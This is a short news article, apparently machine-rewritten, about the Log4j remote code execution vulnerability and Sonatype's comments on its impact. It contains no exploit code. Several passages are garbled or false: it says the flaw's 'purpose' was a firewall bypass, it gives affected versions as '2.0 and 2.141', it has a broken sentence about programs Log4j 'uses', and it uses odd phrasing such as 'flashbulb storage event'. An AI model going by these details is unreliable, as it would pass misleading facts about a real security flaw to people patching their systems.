A new zero-day vulnerability was discovered in the widely used Java logging framework Log4j, which could potentially affect Minecraft, iCloud, Steam and other Java-based software.
The purpose of the Log4j vulnerability was to create a firewall bypass that would allow attackers to access otherwise inaccessible areas of an application. The vulnerability was discovered by a security researcher from Hewlett-Packard’s Zero Day Initiative, who discovered several new vulnerabilities during an audit of the widely used Log4j software.
This type of bug is particularly serious because it can be exploited to execute any code and little specialist knowledge is required for an attacker to execute. Since Apache’s Log4j is typically used in Java applications, software maintainers must act quickly to protect themselves against possible attacks through updates.
A similar vulnerability was exploited in the Equifax data breach in 2017, in which the personal information of nearly 150 million people was leaked online.
However, as Log4j has become quite popular in the Java ecosystem, this new exploit could prove to be even more dangerous.
The Log4j exploit was revealed when a proof of concept (PoC) for a vulnerability was posted and published in a GitHub repository, according to a new blog post by Sonatype.
The weak point is in the Log4j library and affects versions 2.0 and 2.141 as well as current Java 11 runtimes. Fortunately, however, Apache has already released a patch for the problem that is requiring software developers to install it before their customers can safely use it.
Any program that Log4j uses for logging, including popular games like Minecraft that Sonatype has already seen evidence of being exploited in the context of its built-in chat function. There has been much speculation as to whether or not this vulnerability has already been exploited.
As with other similar remote code execution attacks in the past, there is significant evidence that hackers and other cybercriminals have started scouring the Internet for applications that need to be fixed. Companies that rely on Log4j for their software should update it as soon as possible to the latest version 2.15, which can be accessed via Maven Central.
Brian Fox, CTO of Sonatype, spoke on JavaOne about the Log4j bug and its global impact. He said:
“This new Log4j vulnerability is likely to be another flashbulb storage event on the major vulnerability timeline. It is the most widely used logging framework in the Java ecosystem. The scope of the applications affected is comparable to the vulnerability of the Commons Collection from 2015 (CVE 2015-7501), since attackers can safely assume that targets probably have them in the classpath. The impact is similar to previous Struts vulnerabilities, such as the one affecting Equifax, in that the attacks can be carried out remotely, anonymously, without credentials, and result in a remote exploit. The combination of scope and potential impact here is different from any previous component vulnerability that I can easily remember. “
Subtle, charming pop culture freak. Amateur analyst. Freelance TV fan. Coffee lover